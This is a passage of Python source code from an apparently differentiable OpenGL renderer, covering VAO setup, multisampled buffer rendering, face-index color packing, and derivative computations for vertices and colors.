# self.vbo_f_bgCube.bind()
# self.vbo_verts_cube.bind()
# GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_colors_cube.bind()
# GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_uvs_cube.bind()
# GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#
# f = self.f_bgCube
# fc = np.tile(np.arange(len(self.f), len(self.f) + len(f))[:, None], [1, 3]).ravel()
# # fc[:, 0] = fc[:, 0] & 255
# # fc[:, 1] = (fc[:, 1] >> 8) & 255
# # fc[:, 2] = (fc[:, 2] >> 16) & 255
# fc = np.asarray(fc, dtype=np.uint32)
# vbo_face_ids_cube = vbo.VBO(fc)
# vbo_face_ids_cube.bind()
# GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
# GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
#
# #Barycentric cube:
# f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
# vbo_barycentric_cube = vbo.VBO(f_barycentric)
# vbo_barycentric_cube.bind()
# GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_quad = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_quad)
GL.glBindVertexArray(self.vao_quad)
#Bind VAO
self.vbo_face_ids_list = []
self.vbo_barycentric_list = []
self.vao_errors_mesh_list = []
flen = 1
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_face_ids_mesh = []
vbo_barycentric_mesh = []
for polygons in np.arange(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_f.bind()
vbo_verts = self.vbo_verts_mesh[mesh][polygons]
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors = self.vbo_colors_mesh[mesh][polygons]
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_uvs = self.vbo_uvs_mesh[mesh][polygons]
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
f = self.f_list[mesh][polygons]
fc = np.tile(np.arange(flen, flen + len(f))[:,None], [1,3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
vbo_face_ids = vbo.VBO(fc)
vbo_face_ids.bind()
GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
vbo_barycentric = vbo.VBO(f_barycentric)
vbo_barycentric.bind()
GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
flen += len(f)
vaos_mesh += [vao]
vbo_face_ids_mesh += [vbo_face_ids]
vbo_barycentric_mesh += [vbo_barycentric]
GL.glBindVertexArray(0)
self.vbo_face_ids_list += [vbo_face_ids_mesh]
self.vbo_barycentric_list += [vbo_barycentric_mesh]
self.vao_errors_mesh_list += [vaos_mesh]
def render_image_buffers(self):
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
self.makeCurrentContext()
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
GL.glUseProgram(self.errorTextureProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3, GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
# GL.glClearBufferiv(GL.GL_COLOR, 0, 0)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
wwLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_errors_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
# vbo_color.bind()
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
assert primtype == GL.GL_TRIANGLES, "only triangle meshes are supported here"
# GL.glUseProgram(self.errorTextureProgram)
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
else:
texture = self.whitePixelTextureID
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureObjLoc, 0)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f)*vbo_f.data.shape[1])
# # #Background cube:
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube.bind()
# texture = self.whitePixelTextureID
# self.vbo_uvs_cube.bind()
#
# GL.glActiveTexture(GL.GL_TEXTURE0)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# GL.glUniform1i(self.textureObjLoc, 0)
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube)*self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
# self.draw_visibility_image_ms(self.v, self.f)
# GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# # result_blit = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# result_blit2 = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# result_blit_pos = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
GL.glUseProgram(self.fetchSamplesProgram)
# GL.glDisable(GL.GL_MULTISAMPLE)
self.colorsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "colors")
self.sample_positionsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_positions")
self.sample_facesLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_faces")
self.sample_barycentric1Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords1")
self.sample_barycentric2Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords2")
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glActiveTexture(GL.GL_TEXTURE2)
# GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
# GL.glUniform1i(self.sample_facesLoc, 2)
wwLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
# Per-sample buffers laid out as (rows, columns) = (height, width) to match the images read back below.
self.renders = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 3])
self.renders_sample_pos = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 2])
self.renders_faces = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width']], dtype=np.uint32)
self.renders_sample_barycentric1 = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 2])
self.renders_sample_barycentric2 = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 1])
self.renders_sample_barycentric = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 3])
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_sample_fetch)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3,
GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
for sample in np.arange(self.nsamples):
sampleLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'sample')
GL.glUniform1i(sampleLoc, sample)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glUniform1i(self.colorsLoc, 0)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glUniform1i(self.sample_positionsLoc, 1)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glUniform1i(self.sample_facesLoc, 2)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glUniform1i(self.sample_barycentric1Loc, 3)
GL.glActiveTexture(GL.GL_TEXTURE4)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glUniform1i(self.sample_barycentric2Loc, 4)
GL.glBindVertexArray(self.vao_quad)
GL.glDrawArrays(GL.GL_POINTS, 0, 1)
# GL.glBindVertexArray(self.vao_bgCube)
# # self.vbo_f_bgCube.bind()
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube) * self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_sample_fetch)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['width'], 3)[:,:,0:3].astype(np.float64))
self.renders[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['width'], 3)[:,:,0:2].astype(np.float64))
self.renders_sample_pos[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RED_INTEGER, GL.GL_UNSIGNED_INT), np.uint32).reshape(self.frustum['height'], self.frustum['width']).astype(np.uint32))
self.renders_faces[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT3)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['width'], 3)[:,:,0:2].astype(np.float64))
self.renders_sample_barycentric1[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT4)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['width'], 3)[:,:,0:1].astype(np.float64))
self.renders_sample_barycentric2[sample] = result
self.renders_sample_barycentric[sample] = np.concatenate([self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:,:,0:1]], 2)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
# result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# self.renders_faces[sample] = result
GL.glBindVertexArray(0)
GL.glClearColor(0.,0.,0., 1.)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glDisable(GL.GL_MULTISAMPLE)
# Finally resolve the multisampled image and mark the render and derivatives for recomputation
self.render_resolved = np.mean(self.renders, 0)
self.updateRender = True
self.updateDerivatives_verts = True
self.updateDerivatives_vc = True
def draw_visibility_image_ms(self, v, f):
"""Renders the multisampled per-face visibility image. Assumes the camera is already set up correctly."""
GL.glUseProgram(self.visibilityProgram_ms)
v = np.asarray(v)
#Attach FBO
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f)+1)
fc = np.tile(fc.reshape((-1,1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8 ) & 255
fc[:, 2] = (fc[:, 2] >> 16 ) & 255
fc = np.asarray(fc, dtype=np.uint8)
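# Hypothetical worked example of the packing above: face index i is split into one
# byte per color channel, e.g. i = 258 gives r = 258 & 255 = 2, g = (258 >> 8) & 255 = 1,
# b = (258 >> 16) & 255 = 0, so that face renders with the unique color (2, 1, 0).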
self.draw_colored_primitives_ms(self.vao_dyn_ub, v, f, fc)
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives_ms(self, vao, v, f, fc=None):
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1,3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT2]
GL.glDrawBuffers(1, drawingBuffers)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
GL.glEnable(GL.GL_DEPTH_TEST)
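# Illustrative sketch (not called anywhere): how the np.repeat branch above turns one
# color per face into one color per face-vertex for a triangle mesh (f.shape[1] == 3):
# fc = np.array([[255, 0, 0], [0, 255, 0]], dtype=np.uint8) # one RGB color per face
# vc_by_face = np.repeat(fc, 3, axis=0) # 6 rows: one per triangle corner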
def compute_dr_wrt(self, wrt):
visibility = self.visibility_image
if wrt is self.camera:
derivatives_verts = self.get_derivatives_verts()
return derivatives_verts
elif wrt is self.vc:
derivatives_vc = self.get_derivatives_vc()
return derivatives_vc
# Not working atm.:
elif wrt is self.bgcolor:
return 2. * (self.imageGT.r - self.render_image).ravel() * common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
#Not working atm.:
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0] # 4294967295 (0xFFFFFFFF) marks background pixels
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1,2]).ravel()
clr_im = -2. * (self.imageGT.r - self.render_image) * self.renderWithoutTexture
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:,:,0].ravel()[IS]
g = clr_im[:,:,1].ravel()[IS]
b = clr_im[:,:,2].ravel()[IS]
data = np.concatenate((r,g,b))
IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return None
def compute_r(self):
return self.render()
@depends_on(dterms+terms)
def renderWithoutColor(self):
self._call_on_changed()
return self.render_nocolor
@depends_on(dterms+terms)
def renderWithoutTexture(self):
self._call_on_changed()
return self.render_notexture
# @depends_on(dterms+terms)
def render(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateRender:
render = self.compute_image(visible, visibility, self.f)
self.render_result = render
self.updateRender = False
return self.render_result
def get_derivatives_verts(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_verts:
if self.updateRender:
self.render()
if self.overdraw:
# return common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
derivatives_verts = common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
else:
derivatives_verts = common.dImage_wrt_2dVerts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f)
self.derivatives_verts = derivatives_verts
self.updateDerivatives_verts = False
return self.derivatives_verts
def get_derivatives_vc(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_vc:
if self.updateRender:
self.render()
derivatives_vc = self.compute_derivatives_vc(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
self.derivatives_vc = derivatives_vc
self.updateDerivatives_vc = False
return self.derivatives_vc
# # @depends_on(dterms+terms)
# def image_and_derivatives(self):
# # self._call_on_changed()
# visibility = self.visibility_image
#
# color = self.render_resolved
#
# visible = np.nonzero(visibility.ravel() != 4294967295)[0]
# num_visible = len(visible)
#
# barycentric = self.barycentric_image
#
# if self.updateRender:
# render, derivatives = self.compute_image_and_derivatives(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
# self.render = render
# self.derivatives = derivatives
# self.updateRender = False
#
# return self.render, self.derivatives
#
def barycentricDerivatives(self, vertices, faces, verts):
import chumpy as ch
vertices = np.concatenate([vertices, np.ones([vertices.size // 3, 1])], axis=1)
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# # Check with autodiff:
#
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# # negYMat = ch.array([[1,0,self.camera.c.r[0]],[0,-1,self.camera.c.r[1]],[0,0,1]])
# verts_hom_ch = ch.Ch(verts_hom)
# camMtx = ch.Ch(np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])])
# projVerts = (camMtx.dot(view_mtx)).dot(verts_hom_ch.T).T[:, :3].reshape([-1, 3])
# viewVerts = ch.Ch(np.array(projVerts))
# projVerts = projVerts[:, :2] / projVerts[:, 2:3]
#
# chViewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# p0 = ch.Ch(viewVerticesNonBnd[:, 0, :])
# chp0 = p0
#
# p1 = ch.Ch(viewVerticesNonBnd[:, 1, :])
# chp1 = p1
#
# p2 = ch.Ch(viewVerticesNonBnd[:, 2, :])
# chp2 = p2
#
# # D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
# nt = ch.cross(p1 - p0, p2 - p0)
# chnt = nt
# A = 0.5 * ch.sqrt(ch.sum(nt ** 2, axis=1))
# chnt_norm = nt / ch.sqrt(ch.sum(nt ** 2, axis=1))[:, None]
# # nt = nt / A
#
# chb0part2 = ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1)
# chb0 = 0.5 * ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1) / A
# chb1part2 = ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1)
# chb1 = 0.5 * ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1) / A
# chb2part2 = ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1)
# chb2 = 0.5 * ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1) / A
#
# drb0p0 = chb0.dr_wrt(p0)
# drb0p1 = chb0.dr_wrt(p1)
# drb0p2 = chb0.dr_wrt(p2)
#
# drb1p0 = chb1.dr_wrt(p0)
# drb1p1 = chb1.dr_wrt(p1)
# drb1p2 = chb1.dr_wrt(p2)
#
# drb2p0 = chb2.dr_wrt(p0)
# drb2p1 = chb2.dr_wrt(p1)
# drb2p2 = chb2.dr_wrt(p2)
#
# rows = np.tile(np.arange(drb0p0.shape[0])[None, :], [3, 1]).T.ravel()
# cols = np.arange(drb0p0.shape[0] * 3)
#
# drb0p0 = np.array(drb0p0[rows, cols]).reshape([-1, 3])
# drb0p1 = np.array(drb0p1[rows, cols]).reshape([-1, 3])
# drb0p2 = np.array(drb0p2[rows, cols]).reshape([-1, 3])
# drb1p0 = np.array(drb1p0[rows, cols]).reshape([-1, 3])
# drb1p1 = np.array(drb1p1[rows, cols]).reshape([-1, 3])
# drb1p2 = np.array(drb1p2[rows, cols]).reshape([-1, 3])
# drb2p0 = np.array(drb2p0[rows, cols]).reshape([-1, 3])
# drb2p1 = np.array(drb2p1[rows, cols]).reshape([-1, 3])
# drb2p2 = np.array(drb2p2[rows, cols]).reshape([-1, 3])
#
# chdp0 = np.concatenate([drb0p0[:, None, :], drb1p0[:, None, :], drb2p0[:, None, :]], axis=1)
# chdp1 = np.concatenate([drb0p1[:, None, :], drb1p1[:, None, :], drb2p1[:, None, :]], axis=1)
# chdp2 = np.concatenate([drb0p2[:, None, :], drb1p2[:, None, :], drb2p2[:, None, :]], axis=1)
# #
# # dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# # dp = dp[None, :]
viewVerts = projVerts
projVerts = projVerts[:, :2] / projVerts[:, 2:3]
# viewVerticesNonBnd = negYMat.dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
p0 = viewVerticesNonBnd[:, 0, :]
p1 = viewVerticesNonBnd[:, 1, :]
p2 = viewVerticesNonBnd[:, 2, :]
p0_proj = p0[:,0:2]/p0[:,2:3]
p1_proj = p1[:,0:2]/p1[:,2:3]
p2_proj = p2[:,0:2]/p2[:,2:3]
# D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
nt = np.cross(p1 - p0, p2 - p0)
nt_norm = nt / np.linalg.norm(nt, axis=1)[:, None]
# a = -nt_norm[:, 0] / nt_norm[:, 2]
# b = -nt_norm[:, 1] / nt_norm[:, 2]
# c = np.sum(nt_norm * p0, 1) / nt_norm[:, 2]
cam_f = 1  # focal term; only used by the commented-out general formulas below
u = p0[:, 0]/p0[:, 2]
v = p0[:, 1]/p0[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p0[:, 2][:,None], np.zeros([len(p0),1]), (-p0[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p0),1]), p0[:, 2][:,None], (-p0[:,1]/v**2)[:,None]]
dxdp_0 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p1[:, 0]/p1[:, 2]
v = p1[:, 1]/p1[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p1[:, 2][:,None], np.zeros([len(p1),1]), (-p1[:,0]/u**2)[:,None]]
